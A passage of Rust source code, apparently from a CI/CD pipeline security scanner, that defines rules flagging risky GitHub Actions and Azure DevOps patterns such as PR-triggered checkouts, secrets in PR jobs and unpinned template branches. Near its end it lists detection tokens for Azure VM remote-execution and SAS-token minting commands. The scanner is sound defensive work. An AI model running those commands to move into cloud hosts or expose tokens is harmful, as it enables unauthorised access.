981                    // so we walk the stack from `neighbor` to the top.
982                    let cycle_start_idx =
983                        stack.iter().position(|&(n, _)| n == neighbor).unwrap_or(0);
984                    for &(n, _) in &stack[cycle_start_idx..] {
985                        cycle_nodes.insert(n);
986                    }
987                } else if color[neighbor] == 0 {
988                    color[neighbor] = 1;
989                    stack.push((neighbor, 0));
990                }
991            } else {
992                color[node_id] = 2;
993                stack.pop();
994            }
995        }
996    }
997
998    if cycle_nodes.is_empty() {
999        return Vec::new();
1000    }
1001
1002    vec![Finding {
1003        severity: Severity::High,
1004        category: FindingCategory::AuthorityCycle,
1005        path: None,
1006        nodes_involved: cycle_nodes.into_iter().collect(),
1007        message:
1008            "Circular delegation detected — workflow calls itself transitively, creating unbounded privilege escalation paths"
1009                .into(),
1010        recommendation: Recommendation::Manual {
1011            action: "Break the delegation cycle — a workflow must not directly or transitively call itself".into(),
1012        },
1013        source: FindingSource::BuiltIn,
1014        extras: FindingExtras::default(),
1015}]
1016}
1017
1018/// Rule: privileged workflow (OIDC/federated identity) with no provenance attestation step.
1019///
1020/// Scoped to workflows that actually use OIDC/federated identity (an Identity node with
1021/// `META_OIDC = "true"` is present). If no node in the graph has `META_ATTESTS = "true"`,
1022/// emit one Info-severity finding listing the steps with HasAccessTo an OIDC identity.
1023pub fn uplift_without_attestation(graph: &AuthorityGraph) -> Vec<Finding> {
1024    // Scope: only fire when the graph has at least one OIDC-capable Identity
1025    let oidc_identity_ids: Vec<NodeId> = graph
1026        .nodes_of_kind(NodeKind::Identity)
1027        .filter(|n| {
1028            n.metadata
1029                .get(META_OIDC)
1030                .map(|v| v == "true")
1031                .unwrap_or(false)
1032        })
1033        .map(|n| n.id)
1034        .collect();
1035
1036    if oidc_identity_ids.is_empty() {
1037        return Vec::new();
1038    }
1039
1040    // Bail if any node already has META_ATTESTS = true
1041    let has_attestation = graph.nodes.iter().any(|n| {
1042        n.metadata
1043            .get(META_ATTESTS)
1044            .map(|v| v == "true")
1045            .unwrap_or(false)
1046    });
1047    if has_attestation {
1048        return Vec::new();
1049    }
1050
1051    // Collect steps that have HasAccessTo an OIDC identity
1052    let mut steps_using_oidc: Vec<NodeId> = Vec::new();
1053    for edge in &graph.edges {
1054        if edge.kind != EdgeKind::HasAccessTo {
1055            continue;
1056        }
1057        if oidc_identity_ids.contains(&edge.to) && !steps_using_oidc.contains(&edge.from) {
1058            steps_using_oidc.push(edge.from);
1059        }
1060    }
1061
1062    if steps_using_oidc.is_empty() {
1063        return Vec::new();
1064    }
1065
1066    let n = steps_using_oidc.len();
1067    let mut nodes_involved = steps_using_oidc.clone();
1068    nodes_involved.extend(oidc_identity_ids);
1069
1070    vec![Finding {
1071        severity: Severity::Info,
1072        category: FindingCategory::UpliftWithoutAttestation,
1073        path: None,
1074        nodes_involved,
1075        message: format!(
1076            "{n} step(s) use OIDC/federated identity but no provenance attestation step was detected — artifact integrity cannot be verified"
1077        ),
1078        recommendation: Recommendation::Manual {
1079            action: "Add 'actions/attest-build-provenance' after your build step (GHA) to provide SLSA provenance. See https://docs.github.com/en/actions/security-guides/using-artifact-attestations".into(),
1080        },
1081        source: FindingSource::BuiltIn,
1082        extras: FindingExtras::default(),
1083}]
1084}
1085
1086/// Rule: step writes to the environment gate ($GITHUB_ENV / ##vso[task.setvariable]).
1087///
1088/// Authority leaking through the environment gate propagates to subsequent steps
1089/// outside the explicit graph edges. Severity:
1090/// - Untrusted step: Critical (attacker-controlled values inject into pipeline env)
1091/// - Step with secret/identity access: High (secrets may leak into env)
1092/// - Otherwise: Medium (still a propagation risk)
1093pub fn self_mutating_pipeline(graph: &AuthorityGraph) -> Vec<Finding> {
1094    let mut findings = Vec::new();
1095
1096    for step in graph.nodes_of_kind(NodeKind::Step) {
1097        let writes_gate = step
1098            .metadata
1099            .get(META_WRITES_ENV_GATE)
1100            .map(|v| v == "true")
1101            .unwrap_or(false);
1102        if !writes_gate {
1103            continue;
1104        }
1105
1106        // Collect authority targets the step has HasAccessTo
1107        let authority_nodes: Vec<&_> = graph
1108            .edges_from(step.id)
1109            .filter(|e| e.kind == EdgeKind::HasAccessTo)
1110            .filter_map(|e| graph.node(e.to))
1111            .filter(|n| matches!(n.kind, NodeKind::Secret | NodeKind::Identity))
1112            .collect();
1113
1114        let is_untrusted = step.trust_zone == TrustZone::Untrusted;
1115        let has_authority = !authority_nodes.is_empty();
1116
1117        let severity = if is_untrusted {
1118            Severity::Critical
1119        } else if has_authority {
1120            Severity::High
1121        } else {
1122            Severity::Medium
1123        };
1124
1125        let mut nodes_involved = vec![step.id];
1126        nodes_involved.extend(authority_nodes.iter().map(|n| n.id));
1127
1128        let message = if is_untrusted {
1129            format!(
1130                "Untrusted step '{}' writes to the environment gate — attacker-controlled values can inject into subsequent steps' environment",
1131                step.name
1132            )
1133        } else if has_authority {
1134            let authority_label: Vec<String> =
1135                authority_nodes.iter().map(|n| n.name.clone()).collect();
1136            format!(
1137                "Step '{}' writes to the environment gate while holding authority ({}) — secrets may leak into pipeline environment",
1138                step.name,
1139                authority_label.join(", ")
1140            )
1141        } else {
1142            format!(
1143                "Step '{}' writes to the environment gate — values can propagate into subsequent steps' environment",
1144                step.name
1145            )
1146        };
1147
1148        findings.push(Finding {
1149            severity,
1150            category: FindingCategory::SelfMutatingPipeline,
1151            path: None,
1152            nodes_involved,
1153            message,
1154            recommendation: Recommendation::Manual {
1155                action: "Avoid writing secrets or attacker-controlled values to $GITHUB_ENV / $GITHUB_PATH / pipeline variables. Use explicit step outputs with narrow scoping instead.".into(),
1156            },
1157            source: FindingSource::BuiltIn,
1158                extras: FindingExtras::default(),
1159});
1160    }
1161
1162    findings
1163}
1164
1165/// Rule: PR-triggered pipeline performs a self checkout.
1166///
1167/// When a PR/PRT-triggered pipeline checks out the repository, attacker-controlled
1168/// code from the fork lands on the runner. Any subsequent step that reads workspace
1169/// files (which is almost all of them) can exfiltrate secrets or tamper with build
1170/// artifacts. Fires only when the graph has a PR-class trigger.
1171pub fn checkout_self_pr_exposure(graph: &AuthorityGraph) -> Vec<Finding> {
1172    // Only fires when the graph has a PR/PRT trigger
1173    let trigger = graph.metadata.get(META_TRIGGER).map(|s| s.as_str());
1174    let is_pr_context = matches!(trigger, Some("pr") | Some("pull_request_target"));
1175    if !is_pr_context {
1176        return vec![];
1177    }
1178
1179    let mut findings = Vec::new();
1180    for step in graph.nodes_of_kind(NodeKind::Step) {
1181        let is_checkout_self = step
1182            .metadata
1183            .get(META_CHECKOUT_SELF)
1184            .map(|v| v == "true")
1185            .unwrap_or(false);
1186        if !is_checkout_self {
1187            continue;
1188        }
1189        findings.push(Finding {
1190            category: FindingCategory::CheckoutSelfPrExposure,
1191            severity: Severity::High,
1192            message: format!(
1193                "PR-triggered pipeline checks out the repository at step '{}' — \
1194                 attacker-controlled code from the fork lands on the runner and is \
1195                 readable by all subsequent steps",
1196                step.name
1197            ),
1198            path: None,
1199            nodes_involved: vec![step.id],
1200            recommendation: Recommendation::Manual {
1201                action: "Use `persist-credentials: false` and avoid reading workspace \
1202                         files in subsequent privileged steps. Consider `checkout: none` \
1203                         for jobs that only need pipeline config, not source code."
1204                    .into(),
1205            },
1206            source: FindingSource::BuiltIn,
1207            // Splitting privileged from PR-checkout jobs is a meaningful
1208            // restructure — Medium effort.
1209            extras: FindingExtras {
1210                time_to_fix: Some(crate::finding::FixEffort::Medium),
1211                ..FindingExtras::default()
1212            },
1213        });
1214    }
1215    findings
1216}
1217
1218/// Rule: ADO variable group consumed by a PR-triggered job.
1219///
1220/// Variable groups hold secrets scoped to pipelines. When a PR-triggered job has
1221/// `HasAccessTo` a Secret/Identity carrying `META_VARIABLE_GROUP = "true"`, those
1222/// secrets cross into an untrusted-contributor execution context.
1223pub fn variable_group_in_pr_job(graph: &AuthorityGraph) -> Vec<Finding> {
1224    // Only fires when the pipeline has a PR trigger
1225    let trigger = graph
1226        .metadata
1227        .get(META_TRIGGER)
1228        .map(|s| s.as_str())
1229        .unwrap_or("");
1230    if trigger != "pull_request_target" && trigger != "pr" {
1231        return Vec::new();
1232    }
1233
1234    let mut findings = Vec::new();
1235
1236    for step in graph.nodes_of_kind(NodeKind::Step) {
1237        let accessed_var_groups: Vec<&_> = graph
1238            .edges_from(step.id)
1239            .filter(|e| e.kind == EdgeKind::HasAccessTo)
1240            .filter_map(|e| graph.node(e.to))
1241            .filter(|n| {
1242                (n.kind == NodeKind::Secret || n.kind == NodeKind::Identity)
1243                    && n.metadata
1244                        .get(META_VARIABLE_GROUP)
1245                        .map(|v| v == "true")
1246                        .unwrap_or(false)
1247            })
1248            .collect();
1249
1250        if !accessed_var_groups.is_empty() {
1251            let group_names: Vec<_> = accessed_var_groups
1252                .iter()
1253                .map(|n| n.name.as_str())
1254                .collect();
1255            findings.push(Finding {
1256                severity: Severity::Critical,
1257                category: FindingCategory::VariableGroupInPrJob,
1258                path: None,
1259                nodes_involved: std::iter::once(step.id)
1260                    .chain(accessed_var_groups.iter().map(|n| n.id))
1261                    .collect(),
1262                message: format!(
1263                    "PR-triggered step '{}' accesses variable group(s) [{}] — secrets cross into untrusted PR execution context",
1264                    step.name,
1265                    group_names.join(", ")
1266                ),
1267                recommendation: Recommendation::CellosRemediation {
1268                    reason: format!(
1269                        "PR-triggered step '{}' can exfiltrate variable group secrets via untrusted code",
1270                        step.name
1271                    ),
1272                    spec_hint: "cellos run --network deny-all --policy requireEgressDeclared,requireRuntimeSecretDelivery".into(),
1273                },
1274                source: FindingSource::BuiltIn,
1275                        extras: FindingExtras::default(),
1276});
1277        }
1278    }
1279
1280    findings
1281}
1282
1283/// Rule: self-hosted agent pool used by a PR-triggered pipeline that also checks out the repo.
1284///
1285/// All three factors present — self-hosted pool + PR trigger + `checkout:self` — combine to
1286/// allow an attacker to land malicious git hooks on the shared runner via a PR. Those hooks
1287/// persist across pipeline runs and execute with full pipeline authority.
1288pub fn self_hosted_pool_pr_hijack(graph: &AuthorityGraph) -> Vec<Finding> {
1289    let trigger = graph
1290        .metadata
1291        .get(META_TRIGGER)
1292        .map(|s| s.as_str())
1293        .unwrap_or("");
1294    if trigger != "pull_request_target" && trigger != "pr" {
1295        return Vec::new();
1296    }
1297
1298    // Check if any Image node is self-hosted
1299    let has_self_hosted_pool = graph.nodes_of_kind(NodeKind::Image).any(|n| {
1300        n.metadata
1301            .get(META_SELF_HOSTED)
1302            .map(|v| v == "true")
1303            .unwrap_or(false)
1304    });
1305
1306    if !has_self_hosted_pool {
1307        return Vec::new();
1308    }
1309
1310    // Check if any Step does checkout:self
1311    let checkout_steps: Vec<&_> = graph
1312        .nodes_of_kind(NodeKind::Step)
1313        .filter(|n| {
1314            n.metadata
1315                .get(META_CHECKOUT_SELF)
1316                .map(|v| v == "true")
1317                .unwrap_or(false)
1318        })
1319        .collect();
1320
1321    if checkout_steps.is_empty() {
1322        return Vec::new();
1323    }
1324
1325    // All three factors present: self-hosted + PR trigger + checkout:self.
1326    // Collect self-hosted pool nodes for the finding.
1327    let pool_nodes: Vec<&_> = graph
1328        .nodes_of_kind(NodeKind::Image)
1329        .filter(|n| {
1330            n.metadata
1331                .get(META_SELF_HOSTED)
1332                .map(|v| v == "true")
1333                .unwrap_or(false)
1334        })
1335        .collect();
1336
1337    let mut nodes_involved: Vec<NodeId> = pool_nodes.iter().map(|n| n.id).collect();
1338    nodes_involved.extend(checkout_steps.iter().map(|n| n.id));
1339
1340    vec![Finding {
1341        severity: Severity::Critical,
1342        category: FindingCategory::SelfHostedPoolPrHijack,
1343        path: None,
1344        nodes_involved,
1345        message:
1346            "PR-triggered pipeline uses self-hosted agent pool with checkout:self — enables git hook injection persisting across pipeline runs on the shared runner"
1347                .into(),
1348        recommendation: Recommendation::Manual {
1349            action: "Run PR pipelines on Microsoft-hosted (ephemeral) agents, or disable checkout:self for PR-triggered jobs on self-hosted pools".into(),
1350        },
1351        source: FindingSource::BuiltIn,
1352        extras: FindingExtras::default(),
1353}]
1354}
1355
1356// ── shared_self_hosted_pool_no_isolation ──────────────────────────────────────
1357//
1358// ADO self-hosted agent pools retain their workspace between pipeline runs.
1359// Without `workspace: { clean: all }` a build that runs on the shared agent
1360// can leave behind malicious files, compiled artefacts, or git hooks that
1361// persist for the next run — which may be a privileged deployment pipeline.
1362//
1363// Microsoft-hosted agents are ephemeral (Image node has no META_SELF_HOSTED).
1364
1365/// Rule G1: ADO self-hosted pool without workspace isolation.
1366///
1367/// Fires when any Image node (pool) in an ADO pipeline has `META_SELF_HOSTED`
1368/// set but does NOT have `META_WORKSPACE_CLEAN` set.  Microsoft-hosted pools
1369/// are ephemeral and are never flagged.
1370pub fn shared_self_hosted_pool_no_isolation(graph: &AuthorityGraph) -> Vec<Finding> {
1371    let platform = graph.metadata.get(META_PLATFORM).map(|s| s.as_str());
1372    if platform != Some("azure-devops") {
1373        return Vec::new();
1374    }
1375
1376    let mut findings = Vec::new();
1377
1378    for pool in graph.nodes_of_kind(NodeKind::Image) {
1379        let is_self_hosted = pool
1380            .metadata
1381            .get(META_SELF_HOSTED)
1382            .map(|v| v == "true")
1383            .unwrap_or(false);
1384
1385        if !is_self_hosted {
1386            continue;
1387        }
1388
1389        let has_clean = pool
1390            .metadata
1391            .get(META_WORKSPACE_CLEAN)
1392            .map(|v| v == "true")
1393            .unwrap_or(false);
1394
1395        if has_clean {
1396            continue;
1397        }
1398
1399        findings.push(Finding {
1400            severity: Severity::High,
1401            category: FindingCategory::SharedSelfHostedPoolNoIsolation,
1402            path: None,
1403            nodes_involved: vec![pool.id],
1404            message: format!(
1405                "Self-hosted pool '{}' has no workspace isolation (workspace: {{clean: all/true}} not set); \
1406                a previous pipeline run can pollute the workspace for the next — including privileged deployment jobs",
1407                pool.name
1408            ),
1409            recommendation: Recommendation::Manual {
1410                action: "Add `workspace: { clean: all }` to every job that uses a self-hosted pool, \
1411                    or migrate to Microsoft-hosted (ephemeral) agents for untrusted builds.".into(),
1412            },
1413            source: FindingSource::BuiltIn,
1414            extras: FindingExtras::default(),
1415        });
1416    }
1417
1418    findings
1419}
1420
1421/// Rule: ADO service connection with broad/unknown scope and no OIDC federation,
1422/// reachable from a PR-triggered job.
1423///
1424/// Static credentials backing broad-scope service connections can carry
1425/// subscription-wide Azure RBAC. When a PR-triggered step has `HasAccessTo` one of
1426/// these, PR-author-controlled code can move laterally into the Azure tenant.
1427pub fn service_connection_scope_mismatch(graph: &AuthorityGraph) -> Vec<Finding> {
1428    let trigger = graph
1429        .metadata
1430        .get(META_TRIGGER)
1431        .map(|s| s.as_str())
1432        .unwrap_or("");
1433    if trigger != "pull_request_target" && trigger != "pr" {
1434        return Vec::new();
1435    }
1436
1437    let mut findings = Vec::new();
1438
1439    for step in graph.nodes_of_kind(NodeKind::Step) {
1440        let broad_scs: Vec<&_> = graph
1441            .edges_from(step.id)
1442            .filter(|e| e.kind == EdgeKind::HasAccessTo)
1443            .filter_map(|e| graph.node(e.to))
1444            .filter(|n| {
1445                n.kind == NodeKind::Identity
1446                    && n.metadata
1447                        .get(META_SERVICE_CONNECTION)
1448                        .map(|v| v == "true")
1449                        .unwrap_or(false)
1450                    && n.metadata
1451                        .get(META_OIDC)
1452                        .map(|v| v != "true")
1453                        .unwrap_or(true) // not OIDC-federated
1454                    && matches!(
1455                        n.metadata.get(META_IDENTITY_SCOPE).map(|s| s.as_str()),
1456                        Some("broad") | Some("Broad") | None // unknown scope is also a risk
1457                    )
1458            })
1459            .collect();
1460
1461        for sc in &broad_scs {
1462            findings.push(Finding {
1463                severity: Severity::High,
1464                category: FindingCategory::ServiceConnectionScopeMismatch,
1465                path: None,
1466                nodes_involved: vec![step.id, sc.id],
1467                message: format!(
1468                    "PR-triggered step '{}' accesses service connection '{}' with broad/unknown scope and no OIDC federation — static credential may have subscription-wide Azure RBAC",
1469                    step.name, sc.name
1470                ),
1471                recommendation: Recommendation::CellosRemediation {
1472                    reason: "Broad-scope service connection reachable from PR code — CellOS egress isolation limits lateral movement even when connection cannot be immediately rescoped".into(),
1473                    spec_hint: "cellos run --network deny-all --policy requireEgressDeclared".into(),
1474                },
1475                source: FindingSource::BuiltIn,
1476                        extras: FindingExtras::default(),
1477});
1478        }
1479    }
1480
1481    findings
1482}
1483
1484/// ADO-only rule: a `resources.repositories[]` entry resolves against a
1485/// mutable target — no `ref:` field (default branch) or `refs/heads/<x>`
1486/// without a SHA. Whoever owns that branch can inject steps into every
1487/// consuming pipeline at the next run.
1488///
1489/// Pinned forms that do NOT fire:
1490///   - `refs/tags/<x>` — git tags (treated as immutable in practice)
1491///   - bare 40-char hex SHA — explicit commit pin
1492///   - `refs/heads/<sha>` where the trailing segment is a 40-char hex SHA
1493///
1494/// Mutable forms that DO fire:
1495///   - field absent — defaults to the repo's default branch
1496///   - `refs/heads/<branch>` with a normal branch name
1497///   - bare branch name (`main`, `master`, `develop`, ...)
1498///
1499/// Suppression: a repository entry declared with NO `ref:` field AND no
1500/// in-file consumer (`extends:`, `template: x@alias`, or `checkout: alias`)
1501/// is skipped. This catches purely vestigial declarations — a leftover
1502/// `resources.repositories[]` entry that no one references is not an active
1503/// attack surface. An entry with an explicit `ref: refs/heads/<x>` always
1504/// fires regardless of in-file usage, because the explicit branch ref
1505/// signals an intent to consume (the consumer is typically in an included
1506/// template file outside the per-file scan boundary).
1507pub fn template_extends_unpinned_branch(graph: &AuthorityGraph) -> Vec<Finding> {
1508    let raw = match graph.metadata.get(META_REPOSITORIES) {
1509        Some(s) => s,
1510        None => return Vec::new(),
1511    };
1512    let entries: Vec<serde_json::Value> = match serde_json::from_str(raw) {
1513        Ok(v) => v,
1514        Err(_) => return Vec::new(),
1515    };
1516
1517    let mut findings = Vec::new();
1518    for entry in entries {
1519        let alias = match entry.get("alias").and_then(|v| v.as_str()) {
1520            Some(a) => a,
1521            None => continue,
1522        };
1523        let name = entry.get("name").and_then(|v| v.as_str()).unwrap_or(alias);
1524        let repo_type = entry
1525            .get("repo_type")
1526            .and_then(|v| v.as_str())
1527            .unwrap_or("git");
1528        let ref_value = entry.get("ref").and_then(|v| v.as_str());
1529        let used = entry.get("used").and_then(|v| v.as_bool()).unwrap_or(false);
1530
1531        let classification = classify_repository_ref(ref_value);
1532        let resolved = match classification {
1533            RepositoryRefClass::Pinned => continue,
1534            RepositoryRefClass::DefaultBranch => {
1535                // Default-branch entries are only flagged when an in-file
1536                // consumer actually references the alias. Without an explicit
1537                // `ref:` and without a consumer there's no evidence the
1538                // declaration is active — likely vestigial.
1539                if !used {
1540                    continue;
1541                }
1542                "default branch (no ref:)".to_string()
1543            }
1544            RepositoryRefClass::MutableBranch(b) => format!("mutable branch '{b}'"),
1545        };
1546
1547        let pinned_example = format!("ref: <40-char-sha>  # commit on {name}");
1548        findings.push(Finding {
1549            severity: Severity::High,
1550            category: FindingCategory::TemplateExtendsUnpinnedBranch,
1551            path: None,
1552            nodes_involved: Vec::new(),
1553            message: format!(
1554                "ADO resources.repositories alias '{alias}' (type: {repo_type}, name: {name}) resolves to {resolved} — \
1555                 whoever owns that branch can inject steps at the next pipeline run"
1556            ),
1557            recommendation: Recommendation::PinAction {
1558                current: ref_value.unwrap_or("(default branch)").to_string(),
1559                pinned: pinned_example,
1560            },
1561            source: FindingSource::BuiltIn,
1562                extras: FindingExtras::default(),
1563});
1564    }
1565
1566    findings
1567}
1568
1569/// ADO-only rule: a `resources.repositories[]` entry pins to a *feature-class*
1570/// branch — anything outside the platform-blessed set
1571/// (`main`, `master`, `release/*`, `hotfix/*`).
1572///
1573/// Strictly stronger signal than [`template_extends_unpinned_branch`]:
1574///
1575/// * `template_extends_unpinned_branch` fires on *any* mutable branch ref
1576///   (including `main` and `master`) — the abstract "ref isn't pinned to a
1577///   SHA or tag" finding.
1578/// * This rule fires only on the subset that's *worse than main*: a developer
1579///   feature branch (`feature/*`, `topic/*`, `dev/*`, `wip/*`, `users/*`,
1580///   `develop`, …) where push protection is typically weaker than the trunk.
1581///
1582/// The two findings co-fire intentionally — they describe different angles of
1583/// the same risk class. `template_extends_unpinned_branch` says "this isn't
1584/// pinned"; this rule adds "and the branch it points to is one any developer
1585/// can push to without a code review gate".
1586///
1587/// Detection inputs are identical to `template_extends_unpinned_branch`:
1588/// `META_REPOSITORIES` JSON array, with the same `used` suppression for
1589/// `ref`-absent entries.
1590///
1591/// Pinned forms (40-char SHA, `refs/tags/<x>`, `refs/heads/<sha>`) do not
1592/// fire — same classification helper as the parent rule.
1593///
1594/// Default-branch (no-`ref:`) entries do not fire from this rule. The default
1595/// branch is conventionally `main`/`master`, and even when it's something
1596/// else the *implicit* default-branch contract carries less risk than an
1597/// explicit feature-branch pin (the default branch usually has the strongest
1598/// protection in the org). The plain "this isn't pinned" surface is left to
1599/// `template_extends_unpinned_branch`.
1600pub fn template_repo_ref_is_feature_branch(graph: &AuthorityGraph) -> Vec<Finding> {
1601    let raw = match graph.metadata.get(META_REPOSITORIES) {
1602        Some(s) => s,
1603        None => return Vec::new(),
1604    };
1605    let entries: Vec<serde_json::Value> = match serde_json::from_str(raw) {
1606        Ok(v) => v,
1607        Err(_) => return Vec::new(),
1608    };
1609
1610    let mut findings = Vec::new();
1611    for entry in entries {
1612        let alias = match entry.get("alias").and_then(|v| v.as_str()) {
1613            Some(a) => a,
1614            None => continue,
1615        };
1616        let name = entry.get("name").and_then(|v| v.as_str()).unwrap_or(alias);
1617        let repo_type = entry
1618            .get("repo_type")
1619            .and_then(|v| v.as_str())
1620            .unwrap_or("git");
1621        let ref_value = entry.get("ref").and_then(|v| v.as_str());
1622
1623        // Only explicit refs are candidates here — the parent rule covers the
1624        // ref-absent case via the default-branch path.
1625        let branch = match classify_repository_ref(ref_value) {
1626            RepositoryRefClass::MutableBranch(b) => b,
1627            RepositoryRefClass::Pinned | RepositoryRefClass::DefaultBranch => continue,
1628        };
1629
1630        if !is_feature_class_branch(&branch) {
1631            continue;
1632        }
1633
1634        let pinned_example = format!("ref: <40-char-sha>  # commit on {name}");
1635        findings.push(Finding {
1636            severity: Severity::High,
1637            category: FindingCategory::TemplateRepoRefIsFeatureBranch,
1638            path: None,
1639            nodes_involved: Vec::new(),
1640            message: format!(
1641                "ADO resources.repositories alias '{alias}' (type: {repo_type}, name: {name}) is pinned to feature-class branch '{branch}' — \
1642                 weaker than even an unpinned trunk pin: any developer with write access to that branch can inject pipeline steps without a code review on main"
1643            ),
1644            recommendation: Recommendation::PinAction {
1645                current: ref_value.unwrap_or("(default branch)").to_string(),
1646                pinned: pinned_example,
1647            },
1648            source: FindingSource::BuiltIn,
1649                extras: FindingExtras::default(),
1650});
1651    }
1652
1653    findings
1654}
1655
1656/// Returns `true` for ADO branch names that are *not* part of the
1657/// platform-blessed trunk/release set. The blessed set:
1658///
1659///   - `main`, `master`
1660///   - `release/*`, `releases/*`
1661///   - `hotfix/*`, `hotfixes/*`
1662///
1663/// Everything else — `feature/*`, `topic/*`, `dev/*`, `wip/*`, `users/*`,
1664/// `develop`, ad-hoc names — is treated as feature-class.
1665///
1666/// Comparison is case-insensitive and prefix-stripped of any leading
1667/// `refs/heads/` (the [`classify_repository_ref`] caller already strips it,
1668/// but defensive normalisation keeps this helper standalone-testable).
1669fn is_feature_class_branch(branch: &str) -> bool {
1670    let normalised = branch
1671        .trim()
1672        .trim_start_matches("refs/heads/")
1673        .to_ascii_lowercase();
1674
1675    if normalised.is_empty() {
1676        return false;
1677    }
1678
1679    // Exact-match trunk names.
1680    if matches!(normalised.as_str(), "main" | "master") {
1681        return false;
1682    }
1683
1684    // Prefix-match release / hotfix branches (with or without trailing slash).
1685    const TRUNK_PREFIXES: &[&str] = &["release/", "releases/", "hotfix/", "hotfixes/"];
1686    for p in TRUNK_PREFIXES {
1687        if normalised == p.trim_end_matches('/') || normalised.starts_with(p) {
1688            return false;
1689        }
1690    }
1691
1692    true
1693}
1694
1695// ── Command-line credential leakage helpers ─────────────
1696//
1697// These two rules (`vm_remote_exec_via_pipeline_secret`,
1698// `short_lived_sas_in_command_line`) inspect inline script bodies stamped on
1699// Step nodes by the parser as `META_SCRIPT_BODY`. They are intentionally
1700// heuristic — the goal is reliable detection of the corpus pattern, not 100%
1701// false-positive cleanliness. They're allowed to co-fire on the same step:
1702// each describes a different angle of the same risk class.
1703
1704/// Names of the Azure VM remote-execution primitives we care about.
1705/// Match is case-insensitive on the script body.
1706const VM_REMOTE_EXEC_TOKENS: &[&str] = &[
1707    "set-azvmextension",
1708    "invoke-azvmruncommand",
1709    "az vm run-command",
1710    "az vm extension set",
1711];
1712
1713/// Substrings that indicate a SAS token has just been minted in this script.
1714/// Match is case-insensitive on the script body.
1715const SAS_MINT_TOKENS: &[&str] = &[
1716    "new-azstoragecontainersastoken",
1717    "new-azstorageblobsastoken",
1718    "new-azstorageaccountsastoken",
1719    "az storage container generate-sas",
1720    "az storage blob generate-sas",
1721    "az storage account generate-sas",
1722];
1723
1724/// Argument-passing keywords that put a value on the process command line and
1725/// thus into ARM extension status / OS process logs.
1726const COMMAND_LINE_SINK_TOKENS: &[&str] = &[
1727    "commandtoexecute",
1728    "scriptarguments",
1729    "--arguments",
1730    "-argumentlist",
1731    "--scripts",
1732    "-scriptstring",
1733];
1734
1735/// Returns the names of pipeline secret/SAS variables (`$(NAME)`) that the
1736/// step references via `HasAccessTo` a Secret. Used to spot interpolation of
1737/// pipeline secrets into command-line strings.
1738fn step_secret_var_names(graph: &AuthorityGraph, step_id: NodeId) -> Vec<&str> {
1739    graph
1740        .edges_from(step_id)
1741        .filter(|e| e.kind == EdgeKind::HasAccessTo)
1742        .filter_map(|e| graph.node(e.to))
1743        .filter(|n| n.kind == NodeKind::Secret)
1744        .map(|n| n.name.as_str())
1745        .collect()
1746}
1747
1748/// Returns the names of all Secret nodes a step has `HasAccessTo`.
1749/// Used by the script-aware ADO rules to constrain pattern matches to
1750/// `$(VAR)` references that actually resolve to secrets in this graph.
1751fn step_secret_names(graph: &AuthorityGraph, step_id: NodeId) -> Vec<String> {
1752    graph
1753        .edges_from(step_id)
1754        .filter(|e| e.kind == EdgeKind::HasAccessTo)
1755        .filter_map(|e| graph.node(e.to))
1756        .filter(|n| n.kind == NodeKind::Secret)
1757        .map(|n| n.name.clone())
1758        .collect()
1759}
1760
1761/// Heuristic: returns true if a value-bearing variable named `var_name` appears
1762/// to be interpolated into `script_body` (PowerShell `$var` / `"$var"` /
1763/// `` `"$var`" `` form, or ADO `$(var)` form). Case-insensitive.
1764fn body_interpolates_var(script_body: &str, var_name: &str) -> bool {
1765    if var_name.is_empty() {
1766        return false;
1767    }
1768    let body = script_body.to_lowercase();
1769    let name = var_name.to_lowercase();
1770    // ADO macro form
1771    let dollar_paren = format!("$({name})");
1772    if body.contains(&dollar_paren) {
1773        return true;
1774    }
1775    // PowerShell variable form: must be followed by a non-identifier char to
1776    // avoid matching `$varSomething` as `$var`.
1777    let needle = format!("${name}");
1778    let mut search_from = 0usize;
1779    while let Some(pos) = body[search_from..].find(&needle) {
1780        let abs = search_from + pos;
1781        let end = abs + needle.len();
1782        let next = body.as_bytes().get(end).copied();
1783        let is_word = matches!(next, Some(c) if c.is_ascii_alphanumeric() || c == b'_');
1784        if !is_word {
1785            return true;
1786        }
1787        search_from = end;
1788    }
1789    false
1790}
1791
1792/// Returns true if `script` contains `$(secret)` and that occurrence sits on
1793/// a line whose left-hand side looks like a shell-variable assignment:
1794///   - `export FOO=$(SECRET)`
1795///   - `FOO="$(SECRET)"`
1796///   - `$X = "$(SECRET)"` / `$env:X = "$(SECRET)"`
1797///   - `set -a` followed by an assignment is a softer signal but still flagged
1798///
1799/// Returns false when `$(secret)` is part of a command-line argument
1800/// (e.g. `terraform plan -var "k=$(SECRET)"`) — that's covered by other rules.
1801fn script_assigns_secret_to_shell_var(script: &str, secret: &str) -> bool {
1802    let needle = format!("$({secret})");
1803    for line in script.lines() {
1804        if !line.contains(&needle) {
1805            continue;
1806        }
1807        // Strip everything from `$(secret)` rightward — we only inspect what
1808        // comes before it on this line.
1809        let lhs = match line.find(&needle) {
1810            Some(pos) => &line[..pos],
1811            None => continue,
1812        };
1813        let trimmed = lhs.trim_start();
1814
1815        // bash/sh: `export VAR=`, `VAR=`, `set VAR=`, `declare VAR=`
1816        // Look for `<word>=` (no space allowed before `=`) and no leading
1817        // command pipe / non-assignment indicator.
1818        if matches_bash_assignment(trimmed) {
1819            return true;
1820        }
1821
1822        // PowerShell: `$VAR = "..."`, `$env:VAR = "..."`, `${VAR} = "..."`,
1823        // `Set-Variable -Name X -Value "$(SECRET)"`.
1824        if matches_powershell_assignment(trimmed) {
1825            return true;
1826        }
1827    }
1828    false
1829}
1830
1831/// Returns true if `body` contains any of the SAS-mint token substrings.
1832fn body_mints_sas(body_lower: &str) -> bool {
1833    SAS_MINT_TOKENS.iter().any(|t| body_lower.contains(t))
1834}
1835
1836/// Returns true if `body` contains any of the VM remote-exec tool substrings.
1837fn body_uses_vm_remote_exec(body_lower: &str) -> bool {
1838    VM_REMOTE_EXEC_TOKENS.iter().any(|t| body_lower.contains(t))
1839}
1840
1841/// Returns true if `body` contains any command-line sink keyword.
1842fn body_has_cmdline_sink(body_lower: &str) -> bool {
1843    COMMAND_LINE_SINK_TOKENS
1844        .iter()
1845        .any(|t| body_lower.contains(t))
1846}
1847
1848/// Extract names of PowerShell variables that are bound to a SAS-mint result.
1849/// Pattern: `$<name> = New-AzStorage...SASToken ...` (case-insensitive).
1850/// Returns the variable names without the leading `$`.
1851fn powershell_sas_assignments(body: &str) -> Vec<String> {
1852    let mut out = Vec::new();
1853    let lower = body.to_lowercase();
1854    let bytes = lower.as_bytes();
1855    let mut i = 0usize;
1856    while i < bytes.len() {
1857        if bytes[i] != b'$' {
1858            i += 1;
1859            continue;
1860        }
